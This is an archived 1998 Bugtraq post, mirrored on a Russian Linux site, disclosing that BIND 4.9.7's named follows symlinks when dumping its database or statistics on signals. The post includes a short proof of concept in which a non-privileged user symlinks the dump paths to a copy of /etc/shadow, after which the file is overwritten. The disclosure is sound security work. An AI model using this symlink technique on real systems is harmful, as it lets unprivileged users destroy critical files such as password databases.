The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


BIND 4.9.7 named follows symlinks, clobbers anything.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Sat, 11 Apr 1998 12:43:40 +0600 (ESD)
Date: Fri, 10 Apr 1998 13:29:20 -0700
From: Joe <[email protected]>
To: [email protected]
Subject: BIND 4.9.7 named follows symlinks, clobbers anything.

[ Posted to BUGTRAQ and comp.protocols.dns.bind ]
[ Standard apologies if this is already known - a search on the Bugtraq
  archive and Deja News comp.protocols.dns.bind doesn't indicate it.]

The new named(8) happily follows symlinks and clobbers any file on the
system when it receives a SIGINT. (Used for debugging and statistics
gathering) SIGINT dumps the named database to /var/tmp/named_dump.db

It will also happily append data to any system file when it receives a
SIGIOT. SIGIOT appends named statistics to /var/tmp/named.stats.

This problem is probably recursive to previous versions of named but since
I've already replaced mine I can't confirm that.

On Wed, 8 Apr 1998, Aleph One wrote:

[Snippage of the latest CERT]

>      (Note: the in.named(8) man page mentions that sending a SIGINT to the
>      in.named process will dump the current data base and cache to, by
>      default, /var/tmp/named_dump.db. Some sites may find this useful in
>      looking for self-referential CNAMEs.  Please see the in.named(8) man
>      page for further details.)


This caught my eye in that CERT advisory and after updating my BIND to the
new 4.9.7 ( RedHat 4.2 Linux 2.0.30 i586 ) and reading through the
named(8) man pages I ran a quick check.

[root]# cp /etc/shadow /etc/junk.shadow
[root]# ls -l /etc/junk.shadow
-r--------   1 root     root          992 Apr 10 12:52 junk.shadow

Now as a non-priv user..

[Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
[Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
[Luser]# logout

(Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is toast...)

[root]# kill -SIGIOT [named.pid]

[root]# ls -al /etc/junk.shadow
-r--------   1 root     root         2251 Apr 10 13:00 /etc/junk.shadow

[root]# less /etc/junk.shadow

        someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
        nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
        +++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
        2368    time since boot (secs)
        2368    time since reset (secs)
        0       Unknown query types
<SNIP>

The statistics dump gets appended to any file on the system.

Now for the real horror -

[root]# kill -SIGINT [named.pid]
[root]# ls -l /etc/junk.shadow
-r--------   1 root     root         5249 Apr 10 13:02 /etc/junk.shadow
[root]# less /etc/junk.shadow

        ; Dumped at Fri Apr 10 13:02:40 1998
        ;; ++zone table++
        <SNIP>

No trace of the original remains. Your shadow password file or anything
else on the system is fried.

Enjoy.


--
Joe H.                                  Technical Support
General Support:  [email protected]     Blarg! Online Services, Inc.
Voice:  425/401-9821 or 888/66-BLARG    http://www.blarg.net

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру